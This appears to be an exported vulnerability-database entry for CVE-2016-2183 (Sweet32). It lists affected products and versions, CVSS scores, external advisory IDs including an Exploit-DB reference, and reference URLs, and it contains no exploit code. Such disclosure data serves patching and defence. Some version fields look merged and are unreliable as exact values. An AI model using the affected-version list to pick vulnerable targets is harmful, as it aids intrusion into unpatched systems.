vendor:	cisco	model:	aironet series access points	scope:	ne	version:	270015.5(3)	Trust: 0.3
vendor:	hp	model:	loadrunner patch	scope:	eq	version:	11.521	Trust: 0.3
vendor:	oracle	model:	mysql	scope:	eq	version:	5.6.30	Trust: 0.3
vendor:	oracle	model:	mysql	scope:	eq	version:	5.6.4	Trust: 0.3
vendor:	ibm	model:	spectrum control	scope:	eq	version:	5.2.11	Trust: 0.3
vendor:	f5	model:	big-ip link controller	scope:	eq	version:	11.5.1	Trust: 0.3
vendor:	cisco	model:	telepresence server on virtual machine	scope:	eq	version:	0	Trust: 0.3
vendor:	f5	model:	big-ip link controller	scope:	eq	version:	12.1.2	Trust: 0.3
vendor:	cisco	model:	webex meetings for android	scope:	eq	version:	0	Trust: 0.3
vendor:	ibm	model:	rational application developer for websphere software	scope:	eq	version:	9.5	Trust: 0.3
vendor:	redhat	model:	enterprise linux	scope:	eq	version:	6	Trust: 0.3
vendor:	hp	model:	performance center	scope:	eq	version:	12.00	Trust: 0.3
vendor:	f5	model:	big-iq centralized management	scope:	eq	version:	5.2	Trust: 0.3
vendor:	netapp	model:	snap creator framework	scope:	eq	version:	0	Trust: 0.3
vendor:	f5	model:	big-ip pem	scope:	eq	version:	11.5.3	Trust: 0.3
vendor:	f5	model:	big-ip gtm	scope:	eq	version:	11.5.4	Trust: 0.3
vendor:	cisco	model:	nexus series switches 5.2.8	scope:	ne	version:	5000	Trust: 0.3
vendor:	cisco	model:	digital media manager 5.4.1 rb4	scope:	ne	version:	-	Trust: 0.3
vendor:	cisco	model:	unified workforce optimization quality management solution	scope:	eq	version:	-0	Trust: 0.3
vendor:	cisco	model:	telepresence integrator c series tc7.3.7	scope:	ne	version:	-	Trust: 0.3
vendor:	ibm	model:	tivoli provisioning manager for os deployment	scope:	eq	version:	5.1.3	Trust: 0.3
vendor:	f5	model:	big-ip aam	scope:	eq	version:	11.5.2	Trust: 0.3
vendor:	ibm	model:	db2® advanced workgroup server edition	scope:	eq	version:	10.5	Trust: 0.3
vendor:	oracle	model:	mysql	scope:	eq	version:	5.6.13	Trust: 0.3
vendor:	cisco	model:	spa122 analog telephone adapter with router	scope:	ne	version:	1.4.2	Trust: 0.3
vendor:	cisco	model:	cloud object storage	scope:	eq	version:	0	Trust: 0.3
vendor:	ibm	model:	sterling connect:express for unix	scope:	eq	version:	1.4	Trust: 0.3
vendor:	python	model:	software foundation python	scope:	eq	version:	2.7.10	Trust: 0.3
vendor:	oracle	model:	mysql	scope:	eq	version:	5.7.5	Trust: 0.3
vendor:	ibm	model:	rrdi	scope:	eq	version:	2.0.1	Trust: 0.3
vendor:	hp	model:	performance center agent	scope:	eq	version:	11	Trust: 0.3
vendor:	ibm	model:	worklight enterprise edition	scope:	eq	version:	6.1.0.2	Trust: 0.3
vendor:	oracle	model:	vm virtualbox	scope:	eq	version:	5.0.14	Trust: 0.3
vendor:	ibm	model:	sonas	scope:	eq	version:	1.5.2.4	Trust: 0.3
vendor:	mcafee	model:	email gateway	scope:	eq	version:	7.6.3	Trust: 0.3
vendor:	f5	model:	iworkflow	scope:	eq	version:	2.2	Trust: 0.3
vendor:	oracle	model:	mysql	scope:	eq	version:	5.7.4	Trust: 0.3
vendor:	ibm	model:	java sdk	scope:	ne	version:	6.1.8.41	Trust: 0.3
vendor:	openssl	model:	project openssl	scope:	ne	version:	1.1	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	eq	version:	1.2.0.4	Trust: 0.3
vendor:	f5	model:	big-ip link controller	scope:	eq	version:	11.6	Trust: 0.3
vendor:	cisco	model:	unified intelligent contact management enterprise	scope:	eq	version:	0	Trust: 0.3
vendor:	f5	model:	big-ip ltm	scope:	eq	version:	12.1.2	Trust: 0.3
vendor:	f5	model:	big-ip pem	scope:	ne	version:	14.0	Trust: 0.3
vendor:	ibm	model:	security network protection	scope:	eq	version:	5.3.2.4	Trust: 0.3
vendor:	f5	model:	big-ip gtm	scope:	eq	version:	11.6.1	Trust: 0.3
vendor:	cisco	model:	application and content networking system	scope:	eq	version:	0	Trust: 0.3
vendor:	f5	model:	big-ip apm	scope:	eq	version:	10.2.2	Trust: 0.3
vendor:	cisco	model:	anyconnect secure mobility client for ios	scope:	eq	version:	0	Trust: 0.3
vendor:	f5	model:	big-ip webaccelerator	scope:	eq	version:	10.2.4	Trust: 0.3
vendor:	f5	model:	big-ip psm	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip apm	scope:	eq	version:	11.6.2	Trust: 0.3
vendor:	cisco	model:	ace application control engine	scope:	eq	version:	47100	Trust: 0.3
vendor:	f5	model:	big-ip ltm	scope:	eq	version:	10.2.3	Trust: 0.3
vendor:	oracle	model:	oss support tools	scope:	ne	version:	8.15.17.3.14	Trust: 0.3
vendor:	cisco	model:	anyconnect secure mobility client for mac os	scope:	eq	version:	x0	Trust: 0.3
vendor:	f5	model:	big-ip websafe	scope:	ne	version:	11.6	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	eq	version:	1.1.0.2	Trust: 0.3
vendor:	f5	model:	big-iq security	scope:	eq	version:	4.0	Trust: 0.3
vendor:	f5	model:	big-ip websafe	scope:	ne	version:	12.1.1	Trust: 0.3
vendor:	oracle	model:	commerce guided search	scope:	eq	version:	6.4.1.2	Trust: 0.3
vendor:	ibm	model:	tivoli provisioning manager for images build	scope:	ne	version:	7.1.1.20290.1	Trust: 0.3
vendor:	cisco	model:	prime infrastructure plug and play standalone gateway	scope:	eq	version:	0	Trust: 0.3
vendor:	ibm	model:	security network protection	scope:	eq	version:	5.3.1.2	Trust: 0.3
vendor:	f5	model:	big-ip ltm hf2	scope:	ne	version:	13.0	Trust: 0.3
vendor:	cisco	model:	virtual security gateway	scope:	ne	version:	2.1.6	Trust: 0.3
vendor:	cisco	model:	nexus series switches	scope:	ne	version:	50006.2.19	Trust: 0.3
vendor:	f5	model:	linerate	scope:	eq	version:	2.5	Trust: 0.3
vendor:	f5	model:	big-iq centralized management	scope:	eq	version:	5.3	Trust: 0.3
vendor:	f5	model:	big-ip apm	scope:	eq	version:	11.5.6	Trust: 0.3
vendor:	f5	model:	big-ip analytics	scope:	eq	version:	11.5.3	Trust: 0.3
vendor:	f5	model:	big-ip afm	scope:	eq	version:	11.4	Trust: 0.3
vendor:	cisco	model:	telepresence conductor	scope:	eq	version:	0	Trust: 0.3
vendor:	oracle	model:	mysql	scope:	eq	version:	5.7.3	Trust: 0.3
vendor:	f5	model:	big-ip wom	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	cisco	model:	application policy infrastructure controller	scope:	eq	version:	0	Trust: 0.3
vendor:	openssl	model:	project openssl 1.0.1u	scope:	ne	version:	-	Trust: 0.3
vendor:	cisco	model:	jabber for mac	scope:	eq	version:	0	Trust: 0.3
vendor:	pexip	model:	infinity	scope:	eq	version:	8.1	Trust: 0.3
vendor:	ibm	model:	storwize unified	scope:	eq	version:	v70001.5.2.2	Trust: 0.3
vendor:	python	model:	software foundation python	scope:	ne	version:	3.4.7	Trust: 0.3
vendor:	f5	model:	big-ip pem	scope:	eq	version:	12.1.1	Trust: 0.3
vendor:	cisco	model:	prime network registrar	scope:	ne	version:	9.0	Trust: 0.3
vendor:	ibm	model:	security network protection	scope:	eq	version:	5.3.3	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	eq	version:	6.0.0.0	Trust: 0.3
vendor:	ibm	model:	cognos metrics manager	scope:	eq	version:	10.2.2	Trust: 0.3
vendor:	cisco	model:	jabber for iphone and ipad	scope:	ne	version:	11.8	Trust: 0.3
vendor:	pexip	model:	infinity	scope:	eq	version:	12.1	Trust: 0.3
vendor:	hp	model:	loadrunner patch	scope:	eq	version:	12.503	Trust: 0.3
vendor:	f5	model:	big-ip asm	scope:	eq	version:	11.5.2	Trust: 0.3
vendor:	ibm	model:	i	scope:	eq	version:	7.1	Trust: 0.3
vendor:	ibm	model:	java sdk	scope:	eq	version:	6.1.8.35	Trust: 0.3
vendor:	ibm	model:	db2® connect? unlimited edition for system z®	scope:	eq	version:	11.1	Trust: 0.3
vendor:	ibm	model:	worklight enterprise edition	scope:	eq	version:	6.1.0.1	Trust: 0.3
vendor:	cisco	model:	telepresence video communication server	scope:	ne	version:	x8.8.3	Trust: 0.3
vendor:	f5	model:	big-ip ltm	scope:	eq	version:	11.6.0	Trust: 0.3
vendor:	f5	model:	big-ip dns	scope:	eq	version:	12.1.3	Trust: 0.3
vendor:	oracle	model:	mysql	scope:	eq	version:	5.6.16	Trust: 0.3
vendor:	ibm	model:	db2® connect? application server edition	scope:	eq	version:	9.7	Trust: 0.3
vendor:	f5	model:	big-iq cloud	scope:	eq	version:	4.3	Trust: 0.3
vendor:	ibm	model:	tivoli storage productivity center	scope:	eq	version:	5.2.4.1	Trust: 0.3
vendor:	f5	model:	traffix sdc	scope:	eq	version:	4.0	Trust: 0.3
vendor:	cisco	model:	series digital media players 5.4.1 rb4	scope:	ne	version:	4400	Trust: 0.3
vendor:	ibm	model:	sterling connect:express for unix	scope:	eq	version:	1.5.0	Trust: 0.3
vendor:	cisco	model:	multicast manager	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	aironet series access points	scope:	ne	version:	270016.3	Trust: 0.3
vendor:	f5	model:	big-ip analytics	scope:	ne	version:	14.0	Trust: 0.3
vendor:	ibm	model:	sterling b2b integrator	scope:	eq	version:	5.2	Trust: 0.3
vendor:	ibm	model:	cognos business intelligence server	scope:	eq	version:	10.2	Trust: 0.3
vendor:	f5	model:	big-ip link controller	scope:	eq	version:	12.0	Trust: 0.3
vendor:	f5	model:	big-ip link controller	scope:	eq	version:	11.4.1	Trust: 0.3
vendor:	pexip	model:	infinity	scope:	eq	version:	5	Trust: 0.3
vendor:	cisco	model:	anyconnect secure mobility client for ios	scope:	ne	version:	4.0.7	Trust: 0.3
vendor:	redhat	model:	enterprise linux	scope:	eq	version:	7	Trust: 0.3
vendor:	cisco	model:	secure access control system	scope:	ne	version:	5.8.0.32.8	Trust: 0.3
vendor:	f5	model:	big-ip afm hf1	scope:	ne	version:	12.1.2	Trust: 0.3
vendor:	f5	model:	big-iq security	scope:	eq	version:	4.2	Trust: 0.3
vendor:	f5	model:	big-ip gtm	scope:	eq	version:	11.5.3	Trust: 0.3
vendor:	cisco	model:	webex node for mcs	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	telepresence mcu	scope:	ne	version:	4.5(1.89)	Trust: 0.3
vendor:	hp	model:	performance center	scope:	eq	version:	12.01	Trust: 0.3
vendor:	cisco	model:	management appliance	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	anyconnect secure mobility client for windows	scope:	ne	version:	4.0.7	Trust: 0.3
vendor:	f5	model:	big-ip ltm	scope:	eq	version:	12.1.3	Trust: 0.3
vendor:	f5	model:	big-ip link controller	scope:	eq	version:	10.2.4	Trust: 0.3
vendor:	python	model:	software foundation python	scope:	eq	version:	2.7.12	Trust: 0.3
vendor:	f5	model:	big-ip afm	scope:	eq	version:	11.5.2	Trust: 0.3
vendor:	ibm	model:	db2® workgroup server edition	scope:	eq	version:	10.1	Trust: 0.3
vendor:	cisco	model:	videoscape anyres live	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	video surveillance ptz ip cameras	scope:	eq	version:	0	Trust: 0.3
vendor:	hp	model:	loadrunner	scope:	eq	version:	11.52.1	Trust: 0.3
vendor:	ibm	model:	db2 direct standard edition	scope:	eq	version:	10.1	Trust: 0.3
vendor:	f5	model:	big-ip aam	scope:	eq	version:	11.6.3	Trust: 0.3
vendor:	oracle	model:	mysql	scope:	eq	version:	5.6.31	Trust: 0.3
vendor:	f5	model:	iworkflow	scope:	eq	version:	2.0	Trust: 0.3
vendor:	cisco	model:	telepresence serial gateway series	scope:	eq	version:	0	Trust: 0.3
vendor:	ibm	model:	i	scope:	eq	version:	7.2	Trust: 0.3
vendor:	f5	model:	big-ip asm	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	ibm	model:	sterling connect:direct for hp nonstop	scope:	eq	version:	3.6	Trust: 0.3
vendor:	cisco	model:	telepresence server on multiparty media	scope:	ne	version:	8204.4	Trust: 0.3
vendor:	ibm	model:	tivoli storage productivity center	scope:	eq	version:	5.2.3	Trust: 0.3
vendor:	ibm	model:	db2® connect? enterprise edition	scope:	eq	version:	10.1	Trust: 0.3
vendor:	f5	model:	big-ip analytics	scope:	eq	version:	12.1.1	Trust: 0.3
vendor:	redhat	model:	enterprise linux for power	scope:	eq	version:	97	Trust: 0.3
vendor:	oracle	model:	mysql	scope:	eq	version:	5.7.13	Trust: 0.3
vendor:	f5	model:	big-ip pem	scope:	eq	version:	11.4.1	Trust: 0.3
vendor:	hp	model:	loadrunner patch	scope:	eq	version:	11.523	Trust: 0.3
vendor:	f5	model:	big-ip ltm	scope:	eq	version:	11.5	Trust: 0.3
vendor:	netapp	model:	ontap select deploy administration tool	scope:	eq	version:	0	Trust: 0.3
vendor:	ibm	model:	db2® advanced enterprise server edition	scope:	eq	version:	10.1	Trust: 0.3
vendor:	f5	model:	big-ip gtm	scope:	eq	version:	11.2.1	Trust: 0.3
vendor:	mcafee	model:	email gateway	scope:	eq	version:	7.6.400	Trust: 0.3
vendor:	cisco	model:	unified ip phone	scope:	eq	version:	89610	Trust: 0.3
vendor:	cisco	model:	expressway series	scope:	ne	version:	x8.8.3	Trust: 0.3
vendor:	f5	model:	big-ip pem	scope:	eq	version:	11.5.5	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	eq	version:	1.1.0.12	Trust: 0.3
vendor:	oracle	model:	commerce guided search	scope:	eq	version:	6.3	Trust: 0.3
vendor:	f5	model:	traffix sdc	scope:	eq	version:	4.2	Trust: 0.3
vendor:	cisco	model:	prime network	scope:	ne	version:	431	Trust: 0.3
vendor:	ibm	model:	aix	scope:	eq	version:	7.1	Trust: 0.3
vendor:	cisco	model:	telepresence system	scope:	eq	version:	500-320	Trust: 0.3
vendor:	cisco	model:	unified attendant console enterprise edition	scope:	eq	version:	0	Trust: 0.3
vendor:	f5	model:	big-iq security	scope:	eq	version:	4.1	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	eq	version:	1.2.0.14	Trust: 0.3
vendor:	cisco	model:	unified contact center express	scope:	eq	version:	0	Trust: 0.3
vendor:	oracle	model:	vm virtualbox	scope:	eq	version:	5.0.26	Trust: 0.3
vendor:	ibm	model:	tivoli provisioning manager for os deployment	scope:	eq	version:	7.1.1	Trust: 0.3
vendor:	f5	model:	big-ip ltm	scope:	eq	version:	10.2.4	Trust: 0.3
vendor:	cisco	model:	network analysis module 6.2	scope:	ne	version:	-	Trust: 0.3
vendor:	cisco	model:	telepresence system ex series ce8.2.2	scope:	ne	version:	-	Trust: 0.3
vendor:	f5	model:	big-ip apm	scope:	eq	version:	10.2.3	Trust: 0.3
vendor:	cisco	model:	prime data center network manager	scope:	eq	version:	-	Trust: 0.3
vendor:	cisco	model:	mxe series media experience engines	scope:	eq	version:	35000	Trust: 0.3
vendor:	cisco	model:	universal small cell cloudbase factory recovery root filesystem	scope:	ne	version:	3.17.3	Trust: 0.3
vendor:	cisco	model:	videoscape control suite	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	unified communications manager	scope:	eq	version:	0	Trust: 0.3
vendor:	f5	model:	big-ip ltm hf3	scope:	ne	version:	13.0	Trust: 0.3
vendor:	cisco	model:	tandberg codian mse	scope:	eq	version:	83200	Trust: 0.3
vendor:	cisco	model:	ip series phones vpn feature	scope:	eq	version:	8800-0	Trust: 0.3
vendor:	ibm	model:	mobilefirst platform foundation	scope:	eq	version:	7.0.0.0	Trust: 0.3
vendor:	ibm	model:	security network protection	scope:	eq	version:	5.3.1.9	Trust: 0.3
vendor:	ibm	model:	security network protection	scope:	eq	version:	5.3.1.3	Trust: 0.3
vendor:	f5	model:	big-ip link controller	scope:	eq	version:	11.5.7	Trust: 0.3
vendor:	ibm	model:	smartcloud entry	scope:	eq	version:	2.2	Trust: 0.3
vendor:	f5	model:	big-ip aam	scope:	eq	version:	12.1.2	Trust: 0.3
vendor:	oracle	model:	mysql	scope:	eq	version:	5.6.27	Trust: 0.3
vendor:	oracle	model:	mysql	scope:	eq	version:	5.6.17	Trust: 0.3
vendor:	oracle	model:	mysql	scope:	eq	version:	5.6.18	Trust: 0.3
vendor:	oracle	model:	enterprise manager base platform	scope:	eq	version:	13.2.0.0	Trust: 0.3
vendor:	f5	model:	big-iq cloud	scope:	eq	version:	4.5	Trust: 0.3
vendor:	f5	model:	big-ip asm	scope:	eq	version:	11.6.3	Trust: 0.3
vendor:	mcafee	model:	email gateway	scope:	ne	version:	7.6.406-3402.103	Trust: 0.3
vendor:	f5	model:	big-ip pem hf1	scope:	ne	version:	13.0.0	Trust: 0.3
vendor:	f5	model:	big-ip afm	scope:	ne	version:	12.1.3.4	Trust: 0.3
vendor:	cisco	model:	unified meetingplace 8.6mr1	scope:	ne	version:	-	Trust: 0.3
vendor:	f5	model:	traffix sdc	scope:	eq	version:	4.1	Trust: 0.3
vendor:	f5	model:	big-ip analytics	scope:	eq	version:	11.4.1	Trust: 0.3
vendor:	cisco	model:	telepresence mx series	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	tapi service provider	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	telepresence system	scope:	eq	version:	500-370	Trust: 0.3
vendor:	cisco	model:	video surveillance series ip cameras	scope:	ne	version:	70002.9	Trust: 0.3
vendor:	ibm	model:	sonas	scope:	eq	version:	1.5.0.2	Trust: 0.3
vendor:	hp	model:	loadrunner	scope:	eq	version:	12.02	Trust: 0.3
vendor:	f5	model:	big-ip apm	scope:	eq	version:	13.0.1	Trust: 0.3
vendor:	f5	model:	big-ip apm	scope:	eq	version:	12.1.0	Trust: 0.3
vendor:	cisco	model:	spa525g 5-line ip phone	scope:	eq	version:	0	Trust: 0.3
vendor:	f5	model:	big-ip analytics	scope:	eq	version:	11.5.5	Trust: 0.3
vendor:	cisco	model:	telepresence profile series	scope:	eq	version:	0	Trust: 0.3
vendor:	ibm	model:	sonas	scope:	eq	version:	1.5.1.0	Trust: 0.3
vendor:	cisco	model:	secure access control system	scope:	eq	version:	0	Trust: 0.3
vendor:	oracle	model:	mysql	scope:	eq	version:	5.6.22	Trust: 0.3
vendor:	ibm	model:	db2® advanced workgroup server edition	scope:	eq	version:	9.7	Trust: 0.3
vendor:	python	model:	software foundation python	scope:	eq	version:	3.4	Trust: 0.3
vendor:	cisco	model:	unified ip series phones	scope:	eq	version:	79000	Trust: 0.3
vendor:	cisco	model:	unified ip conference phone for third-party call control 9.3 sr3	scope:	ne	version:	8831	Trust: 0.3
vendor:	cisco	model:	spa232d multi-line dect analog telephone adapter	scope:	ne	version:	1.4.2	Trust: 0.3
vendor:	cisco	model:	nexus series fabric switches aci mode	scope:	ne	version:	9000-0	Trust: 0.3
vendor:	ibm	model:	tivoli storage productivity center	scope:	eq	version:	5.2.6	Trust: 0.3
vendor:	cisco	model:	visual quality experience tools server	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	virtualization experience media edition	scope:	eq	version:	0	Trust: 0.3
vendor:	f5	model:	big-ip webaccelerator	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	netapp	model:	oncommand insight	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	emergency responder	scope:	eq	version:	0	Trust: 0.3
vendor:	ibm	model:	java sdk	scope:	eq	version:	6.0.16.35	Trust: 0.3
vendor:	mcafee	model:	email gateway 7.6.405h1157986	scope:	-	version:	-	Trust: 0.3
vendor:	f5	model:	big-ip link controller	scope:	eq	version:	13.1	Trust: 0.3
vendor:	ibm	model:	tivoli storage productivity center	scope:	eq	version:	5.2.7	Trust: 0.3
vendor:	ibm	model:	db2® enterprise server edition	scope:	eq	version:	10.1	Trust: 0.3
vendor:	f5	model:	big-ip afm	scope:	eq	version:	11.6.3	Trust: 0.3
vendor:	cisco	model:	registered envelope service	scope:	eq	version:	0	Trust: 0.3
vendor:	f5	model:	big-iq cloud	scope:	eq	version:	4.4	Trust: 0.3
vendor:	cisco	model:	universal small cell series	scope:	ne	version:	70003.5.12.23	Trust: 0.3
vendor:	f5	model:	big-ip apm	scope:	eq	version:	12.1.3	Trust: 0.3
vendor:	cisco	model:	firesight system software	scope:	eq	version:	0	Trust: 0.3
vendor:	ibm	model:	smartcloud entry appliance fi	scope:	eq	version:	2.3.0.4	Trust: 0.3
vendor:	f5	model:	big-ip aam	scope:	eq	version:	12.1.0	Trust: 0.3
vendor:	oracle	model:	mysql	scope:	eq	version:	5.7.15	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	eq	version:	1.1.1.2	Trust: 0.3
vendor:	f5	model:	big-ip aam	scope:	eq	version:	11.6.0	Trust: 0.3
vendor:	cisco	model:	unified meetingplace	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	webex meetings client hosted t32	scope:	ne	version:	-	Trust: 0.3
vendor:	ibm	model:	websphere mq	scope:	eq	version:	6.0.0.0	Trust: 0.3
vendor:	ibm	model:	security virtual server protection for vmware	scope:	eq	version:	1.1.1	Trust: 0.3
vendor:	cisco	model:	unified contact center express	scope:	ne	version:	11.6	Trust: 0.3
vendor:	python	model:	software foundation python	scope:	eq	version:	2.7	Trust: 0.3
vendor:	pexip	model:	infinity	scope:	eq	version:	6	Trust: 0.3
vendor:	ibm	model:	tivoli provisioning manager for images system edition	scope:	eq	version:	x7.1.1.0	Trust: 0.3
vendor:	cisco	model:	webex meetings server	scope:	ne	version:	2.6.1.30	Trust: 0.3
vendor:	f5	model:	big-ip gtm	scope:	eq	version:	11.5.5	Trust: 0.3
vendor:	hp	model:	real user monitor software series	scope:	eq	version:	9.30	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	eq	version:	1.2.0.13	Trust: 0.3
vendor:	mcafee	model:	email gateway	scope:	eq	version:	7.6.402	Trust: 0.3
vendor:	mcafee	model:	epolicy orchestrator	scope:	eq	version:	5.3.0	Trust: 0.3
vendor:	f5	model:	big-ip asm	scope:	eq	version:	12.1.2	Trust: 0.3

sources: BID: 92630 // NVD: CVE-2016-2183

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov:	CVE-2016-2183
value:	HIGH
Trust: 1.0
VULHUB:	VHN-91002
value:	MEDIUM
Trust: 0.1

nvd@nist.gov:	CVE-2016-2183
severity:	MEDIUM
baseScore:	5.0
vectorString:	AV:N/AC:L/AU:N/C:P/I:N/A:N
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	PARTIAL
integrityImpact:	NONE
availabilityImpact:	NONE
exploitabilityScore:	10.0
impactScore:	2.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 1.0
VULHUB:	VHN-91002
severity:	MEDIUM
baseScore:	5.0
vectorString:	AV:N/AC:L/AU:N/C:P/I:N/A:N
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	PARTIAL
integrityImpact:	NONE
availabilityImpact:	NONE
exploitabilityScore:	10.0
impactScore:	2.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.1

nvd@nist.gov:	CVE-2016-2183
baseSeverity:	HIGH
baseScore:	7.5
vectorString:	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
attackVector:	NETWORK
attackComplexity:	LOW
privilegesRequired:	NONE
userInteraction:	NONE
scope:	UNCHANGED
confidentialityImpact:	HIGH
integrityImpact:	NONE
availabilityImpact:	NONE
exploitabilityScore:	3.9
impactScore:	3.6
version:	3.1
Trust: 1.0

sources: VULHUB: VHN-91002 // NVD: CVE-2016-2183

PROBLEMTYPE DATA

problemtype:

CWE-200

Trust: 1.1

sources: VULHUB: VHN-91002 // NVD: CVE-2016-2183

THREAT TYPE

network

Trust: 0.3

sources: BID: 92630

TYPE

Design Error

Trust: 0.3

sources: BID: 92630

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-91002

EXTERNAL IDS

db:	NVD	id:	CVE-2016-2183	Trust: 2.3
db:	BID	id:	92630	Trust: 1.4
db:	MCAFEE	id:	SB10197	Trust: 1.4
db:	PACKETSTORM	id:	142756	Trust: 1.2
db:	ICS CERT	id:	ICSMA-18-058-02	Trust: 1.1
db:	SECTRACK	id:	1036696	Trust: 1.1
db:	PULSESECURE	id:	SA40312	Trust: 1.1
db:	BID	id:	95568	Trust: 1.1
db:	TENABLE	id:	TNS-2017-09	Trust: 1.1
db:	TENABLE	id:	TNS-2016-21	Trust: 1.1
db:	TENABLE	id:	TNS-2016-20	Trust: 1.1
db:	TENABLE	id:	TNS-2016-16	Trust: 1.1
db:	MCAFEE	id:	SB10310	Trust: 1.1
db:	MCAFEE	id:	SB10186	Trust: 1.1
db:	MCAFEE	id:	SB10215	Trust: 1.1
db:	MCAFEE	id:	SB10171	Trust: 1.1
db:	SIEMENS	id:	SSA-412672	Trust: 1.1
db:	JUNIPER	id:	JSA10759	Trust: 1.1
db:	EXPLOIT-DB	id:	42091	Trust: 1.1
db:	PACKETSTORM	id:	161320	Trust: 0.2
db:	PACKETSTORM	id:	141555	Trust: 0.2
db:	PACKETSTORM	id:	140725	Trust: 0.2
db:	PACKETSTORM	id:	140084	Trust: 0.2
db:	PACKETSTORM	id:	148410	Trust: 0.1
db:	PACKETSTORM	id:	141352	Trust: 0.1
db:	PACKETSTORM	id:	140708	Trust: 0.1
db:	PACKETSTORM	id:	143970	Trust: 0.1
db:	PACKETSTORM	id:	150303	Trust: 0.1
db:	PACKETSTORM	id:	140718	Trust: 0.1
db:	PACKETSTORM	id:	143244	Trust: 0.1
db:	PACKETSTORM	id:	141100	Trust: 0.1
db:	PACKETSTORM	id:	140473	Trust: 0.1
db:	PACKETSTORM	id:	141111	Trust: 0.1
db:	PACKETSTORM	id:	141354	Trust: 0.1
db:	PACKETSTORM	id:	144865	Trust: 0.1
db:	PACKETSTORM	id:	143549	Trust: 0.1
db:	PACKETSTORM	id:	144869	Trust: 0.1
db:	PACKETSTORM	id:	142340	Trust: 0.1
db:	PACKETSTORM	id:	145017	Trust: 0.1
db:	PACKETSTORM	id:	156451	Trust: 0.1
db:	PACKETSTORM	id:	147581	Trust: 0.1
db:	PACKETSTORM	id:	152978	Trust: 0.1
db:	PACKETSTORM	id:	140977	Trust: 0.1
db:	PACKETSTORM	id:	154650	Trust: 0.1
db:	PACKETSTORM	id:	145018	Trust: 0.1
db:	PACKETSTORM	id:	141353	Trust: 0.1
db:	PACKETSTORM	id:	159431	Trust: 0.1
db:	CNNVD	id:	CNNVD-201608-448	Trust: 0.1
db:	VULHUB	id:	VHN-91002	Trust: 0.1
db:	PACKETSTORM	id:	142452	Trust: 0.1
db:	PACKETSTORM	id:	138817	Trust: 0.1
db:	PACKETSTORM	id:	138889	Trust: 0.1
db:	PACKETSTORM	id:	144135	Trust: 0.1

sources: VULHUB: VHN-91002 // BID: 92630 // PACKETSTORM: 142452 // PACKETSTORM: 142756 // PACKETSTORM: 138817 // PACKETSTORM: 140084 // PACKETSTORM: 138889 // PACKETSTORM: 141555 // PACKETSTORM: 161320 // PACKETSTORM: 144135 // PACKETSTORM: 140725 // NVD: CVE-2016-2183

REFERENCES

url:	https://access.redhat.com/articles/2548661	Trust: 1.5
url:	https://access.redhat.com/security/cve/cve-2016-2183	Trust: 1.5
url:	https://access.redhat.com/errata/rhsa-2018:2123	Trust: 1.4
url:	http://www-01.ibm.com/support/docview.wss?uid=nas8n1021697	Trust: 1.4
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21995039	Trust: 1.4
url:	http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html	Trust: 1.4
url:	https://sweet32.info/	Trust: 1.4
url:	https://www.openssl.org/blog/blog/2016/08/24/sweet32/	Trust: 1.4
url:	https://kc.mcafee.com/corporate/index?page=content&id=sb10197	Trust: 1.3
url:	https://security.gentoo.org/glsa/201701-65	Trust: 1.2
url:	http://rhn.redhat.com/errata/rhsa-2017-0462.html	Trust: 1.2
url:	https://access.redhat.com/errata/rhsa-2017:1216	Trust: 1.2
url:	https://access.redhat.com/errata/rhsa-2017:2710	Trust: 1.2
url:	http://www.securitytracker.com/id/1036696	Trust: 1.1
url:	http://www.securityfocus.com/archive/1/539885/100/0/threaded	Trust: 1.1
url:	http://www.securityfocus.com/archive/1/archive/1/539885/100/0/threaded	Trust: 1.1
url:	http://www.securityfocus.com/archive/1/archive/1/540129/100/0/threaded	Trust: 1.1
url:	http://www.securityfocus.com/archive/1/540341/100/0/threaded	Trust: 1.1
url:	http://www.securityfocus.com/archive/1/archive/1/540341/100/0/threaded	Trust: 1.1
url:	http://seclists.org/fulldisclosure/2017/may/105	Trust: 1.1
url:	http://seclists.org/fulldisclosure/2017/jul/31	Trust: 1.1
url:	http://www.securityfocus.com/archive/1/541104/100/0/threaded	Trust: 1.1
url:	http://www.securityfocus.com/archive/1/archive/1/541104/100/0/threaded	Trust: 1.1
url:	http://www.securityfocus.com/archive/1/542005/100/0/threaded	Trust: 1.1
url:	http://www.securityfocus.com/archive/1/archive/1/542005/100/0/threaded	Trust: 1.1
url:	https://seclists.org/bugtraq/2018/nov/21	Trust: 1.1
url:	https://www.exploit-db.com/exploits/42091/	Trust: 1.1
url:	http://www.securityfocus.com/bid/92630	Trust: 1.1
url:	http://www.securityfocus.com/bid/95568	Trust: 1.1
